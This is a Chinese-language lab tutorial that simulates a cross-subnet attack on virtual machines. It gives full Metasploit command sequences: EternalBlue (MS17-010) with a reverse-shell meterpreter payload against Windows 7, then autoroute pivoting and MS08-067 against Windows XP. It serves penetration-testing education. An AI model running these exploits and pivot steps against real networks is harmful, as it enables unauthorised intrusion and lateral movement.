跨网段攻击模拟实验

目录

环境:

 模拟攻击Windows7

跨网段攻击阶段:


前言:初学者在使用漏洞进行攻击时,一般都是在同一网段下,所以这次我们来模拟攻击目标主机后,发现其他网段的主机,而后进行跨网段攻击

环境:

Kali Linux

Windows7

winXP

部署:

跨网段攻击模拟实验_第1张图片跨网段攻击模拟实验_第2张图片跨网段攻击模拟实验_第3张图片

这里我们将Kali的网卡设置成NAT模式

Windows7的网卡设置成NAT模式和自定义VMnet模式(双网卡)

WinXP设置成VMnet模式

目的是使kali和Windows7在同一网段,Windows7又和WinXP在同一网段,模拟kali攻击windows7后发现其他网段下的WinXP,从而实施跨网段攻击

kali的IP为192.168.10.137

跨网段攻击模拟实验_第4张图片

Windows7的IP地址为:192.168.10.131   和kali在同一网段

                                      172.16.10.129     和WinXP在同一网段

 跨网段攻击模拟实验_第5张图片

Winxp的IP地址为:172.16.10.128   和Windows7在同一网段

跨网段攻击模拟实验_第6张图片

 模拟攻击Windows7

 打开msfconsole使用ms17-010永恒之蓝漏洞进行攻击

search ms17-010             #搜索永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue     #使用攻击模块
set payload windows/x64/meterpreter/reverse_tcp  #设置反向连接
set rhosts 192.168.10.131   #设置目标主机IP(Windows7)
set lhost 192.168.10.137    #设置攻击者IP(Kali)
set lport 3333              #设置连接端口(此处一般默认设置了4444)
run                         #执行攻击

 跨网段攻击模拟实验_第7张图片

攻击成功并拿到shell终端

这里显示乱码,我们使用chcp 65001进行编码

这里看到除了在同网段的192.168.10.131地址,还发现了其他网段的172.16.10.129的地址

那么接下来就是本次的跨网段攻击环节

跨网段攻击阶段:

使用arp -a查看arp缓存表

跨网段攻击模拟实验_第8张图片

发现其他网段下的主机172.16.10.128

想必就是WinXP主机的IP地址了(现实中通过更多信息搜集确定操作系统和服务器,在针对性实施对应的攻击)

由于提前知道是WinXP,所以我们使用ms08-67漏洞进行攻击

退回meterpreter:

跨网段攻击模拟实验_第9张图片

run autoroute -s 172.16.10.0/24   #添加172.16.10.0/24网段信息
run autoroute -p                  #查看路由信息
background                        #退回msf后台
search ms08-067                   #搜索ms08-067漏洞
use exploit/windows/smb/ms08_067_netapi         #使用攻击模块
set payload windows/meterpreter/bind_tcp        #设置正向连接
set lport 4445                    #设置连接端口
set rhost 172.16.10.128           #设置目标主机IP地址(WinXP)
run                               #执行攻击

跨网段攻击模拟实验_第10张图片

 我们好像攻击成功了,让我们验证一下(后渗透)

跨网段攻击模拟实验_第11张图片

我们截个图看看

跨网段攻击模拟实验_第12张图片

到这里就结束了,以上就是跨网段攻击的演示

嘻嘻

如果有不足,请大佬指正

 

你可能感兴趣的:(安全,网络安全)